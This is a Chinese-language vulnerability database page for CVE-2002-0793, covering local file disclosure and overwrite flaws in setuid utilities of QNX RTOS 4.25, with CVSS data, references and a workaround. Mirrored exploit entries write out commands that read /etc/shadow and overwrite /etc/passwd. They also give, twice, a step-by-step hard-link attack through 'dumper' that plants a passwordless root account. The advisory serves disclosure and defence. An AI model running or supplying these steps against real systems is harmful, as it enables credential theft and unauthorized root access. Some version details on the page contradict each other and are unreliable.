CVE-2002-0793
CVSS4.6
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:57
NMCOES    

[原文]Hard link and possibly symbolic link following vulnerabilities in QNX RTOS 4.25 (aka QNX4) allow local users to overwrite arbitrary files via (1) the -f argument to the monitor utility, (2) the -d argument to dumper, (3) the -c argument to crttrap, or (4) using the Watcom sample utility.


[CNNVD]QNX RTOS CRTTrap存在文件泄露漏洞(CNNVD-200208-050)

        
        QNX RTOS是一款嵌入式的可灵活裁剪的实时操作系统。
        QNX RTOS中的'crttrap'工具存在漏洞,可导致本地攻击者查看系统任意文件内容。
        QNX RTOS中的'crttrap'以setuid root方式默认安装,其中存在-c命令行参数可指定配置文件,由于对指定查看的文件缺少正确的访问控制,可导致本地攻击者使用-c命令行参数查看系统任意敏感文件,包括/etc/shadow。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0793
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-050
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4902
(VENDOR_ADVISORY)  BID  4902
http://www.iss.net/security_center/static/9231.php
(VENDOR_ADVISORY)  XF  qnx-rtos-monitor-f(9231)
http://xforce.iss.net/xforce/xfdb/9234
(UNKNOWN)  XF  qnx-rtos-dumper-symlink(9234)
http://xforce.iss.net/xforce/xfdb/9233
(UNKNOWN)  XF  qnx-rtos-watcom-sample(9233)
http://xforce.iss.net/xforce/xfdb/9232
(UNKNOWN)  XF  qnx-rtos-crttrap-c(9232)
http://www.securityfocus.com/bid/4904
(UNKNOWN)  BID  4904
http://www.securityfocus.com/bid/4903
(UNKNOWN)  BID  4903
http://www.securityfocus.com/bid/4901
(UNKNOWN)  BID  4901
http://archives.neohapsis.com/archives/bugtraq/2002-05/0292.html
(VENDOR_ADVISORY)  BUGTRAQ  20020531 Multiple vulnerabilities in QNX

- 漏洞信息

QNX RTOS CRTTrap存在文件泄露漏洞
中危 访问验证错误
2002-08-12 00:00:00 2005-10-20 00:00:00
本地  
        
        QNX RTOS是一款嵌入式的可灵活裁剪的实时操作系统。
        QNX RTOS中的'crttrap'工具存在漏洞,可导致本地攻击者查看系统任意文件内容。
        QNX RTOS中的'crttrap'以setuid root方式默认安装,其中存在-c命令行参数可指定配置文件,由于对指定查看的文件缺少正确的访问控制,可导致本地攻击者使用-c命令行参数查看系统任意敏感文件,包括/etc/shadow。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用chmod a-s 去掉'crttrap'程序的S位。
        厂商补丁:
        QNX
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.qnx.com/

- 漏洞信息 (21499)

QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability (EDBID:21499)
linux local
2002-05-31 Verified
0 Simon Ouellette
N/A [点击下载]
source: http://www.securityfocus.com/bid/4901/info

The QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. crttrap Local attackers may specify an arbitrary system file in place of the configuration file and crttrap will disclose the contents of the arbitrary file. 

crttrap -c /etc/shadow 		

- 漏洞信息 (21500)

QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability (EDBID:21500)
linux local
2002-05-31 Verified
0 Simon Ouellette
N/A [点击下载]
source: http://www.securityfocus.com/bid/4902/info

The QNX RTOS monitor utility is prone to an issue which may allow local attackers to modify arbitrary system files (such as /etc/passwd). monitor is installed setuid root by default.

The monitor -f command line option may be used by a local attacker to cause an arbitrary system file to be overwritten. Once overwritten, the attacker will gain ownership of the file.

monitor -f /etc/passwd 		

- 漏洞信息 (21501)

QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability (EDBID:21501)
linux local
2002-05-31 Verified
0 Simon Ouellette
N/A [点击下载]
source: http://www.securityfocus.com/bid/4904/info

When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. 

Example exploit, with /bin/dumper:

Let EVIL be the unprivileged user who wants to gain root access.

#link to the passwd file: dumper dumps to [process name].dmp
$ ln /etc/passwd /home/EVIL/ksh.dmp
#call the program that will attempt to write to the hard link
$ dumper -d /home/EVIL -p [PID of EVIL's ksh]
#have dumper do its job by terminating the monitored process
$ exit
#at this point, /etc/passwd is overwritten by the binary dump, and more
importantly: EVIL is now the owner !
$ echo root::0:0::///:/bin/sh > /etc/passwd
#but now no login works because /etc/passwd is not owned by userid 0. #So
you do:

$ passwd

#and change your password. This gives /etc/passwd ownership back to root,
keeping the modifications you have made.

$ su
# 		

- 漏洞信息

12215
QNX RTOS monitor -f Argument Arbitrary File Manipulation
Local Access Required Other
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-05-31 Unknow
2002-05-31 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

QNX RTOS dumper Arbitrary File Modification Vulnerability
Access Validation Error 4904
No Yes
2002-05-31 12:00:00 2009-07-11 01:56:00
Credited to Simon Ouellette <einherj@hotmail.com>.

- 受影响的程序版本

QNX RTOS 4.25
QNX RTOS 6.1

- 不受影响的程序版本

QNX RTOS 6.1

- 漏洞讨论

When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'.

- 漏洞利用

The following demonstration was provided by: "Simon Ouellette" &lt;einherj@hotmail.com&gt;

Example exploit, with /bin/dumper:

Let EVIL be the unprivileged user who wants to gain root access.

#link to the passwd file: dumper dumps to [process name].dmp
$ ln /etc/passwd /home/EVIL/ksh.dmp
#call the program that will attempt to write to the hard link
$ dumper -d /home/EVIL -p [PID of EVIL's ksh]
#have dumper do its job by terminating the monitored process
$ exit
#at this point, /etc/passwd is overwritten by the binary dump, and more
importantly: EVIL is now the owner !
$ echo root::0:0::///:/bin/sh &gt; /etc/passwd
#but now no login works because /etc/passwd is not owned by userid 0. #So
you do:

$ passwd

#and change your password. This gives /etc/passwd ownership back to root,
keeping the modifications you have made.

$ su
#

- 解决方案

The vendor has reported this vulnerability as being fixed in version 6.1.0.


QNX RTOS 4.25

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站